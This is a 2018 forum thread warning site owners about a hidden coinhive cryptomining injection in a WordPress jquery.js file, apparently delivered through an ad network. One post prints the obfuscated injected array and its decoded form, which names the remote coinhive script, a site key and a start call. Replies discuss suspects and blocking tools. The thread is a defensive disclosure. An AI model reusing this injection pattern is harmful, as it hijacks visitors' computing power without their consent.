Title: Warning: potential malicious code originating from advertising network Post by: n3wspartan on January 18, 2018, 10:01:53 PM I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code.
Install an extension such as Minerblock and load your website. I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'. Please report your findings here. I won't disclose the network until we have more evidence. Title: Re: Warning: potential malicious code originating from advertising network Post by: n3wspartan on January 18, 2018, 10:12:20 PM Here's the relevant code if anyone is interested:
Code: var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"]; If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/ (http://ddecode.com/hexdecoder/), you'll get this: Code: var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"]; Title: Re: Warning: potential malicious code originating from advertising network Post by: Anti-Cen on January 18, 2018, 11:24:42 PM Thanks for the warning
When its not Microsoft leaving back doors open it's google and the both share the same paymasters who's name we dare not mention Title: Re: Warning: potential malicious code originating from advertising network Post by: diwataluna on January 19, 2018, 08:59:32 AM I hope more evidence will be posted so more people will be aware especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.
Title: Re: Warning: potential malicious code originating from advertising network Post by: CryptoWave on January 19, 2018, 09:26:23 AM Thanks for the warning When its not Microsoft leaving back doors open it's google and the both share the same paymasters who's name we dare not mention This is likely not google, probably smaller crypto-based networks (Coinzilla, a-ads etc;) Would be great if OP could clarify which network the ad was being served from so people can blacklist them. Title: Re: Warning: potential malicious code originating from advertising network Post by: Lucius on January 19, 2018, 10:23:30 AM I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code. Install an extension such as Minerblock and load your website. I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'. Please report your findings here. I won't disclose the network until we have more evidence. There is a lot of mining scripts hidden in adds,I notice that because my antivirus/firewall is block all of them and give me notice every time.I also ask some of faucet owners about mining on their sites but some of them say they never enable such things,so it is obvious that it is hidden in adds. I do not know is it possible to remove that code without removing adds,but it is not nice to use someone's CPU in this way.It seems that the earnings from crypto related add networks going down and they looking for a way to get some extra profit. Title: Re: Warning: potential malicious code originating from advertising network Post by: diwataluna on January 30, 2018, 06:39:31 AM By any chance, were you referring to what is reported here: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/
I was not able to compare the scripts used yet. Title: Re: Warning: potential malicious code originating from advertising network Post by: bitcoinstud on January 30, 2018, 10:18:08 AM NoScript is quite good for protecting your browser, i run it alongside Adblock Plus...this is true though,ive seen ad content which will download and execute trojans also.
|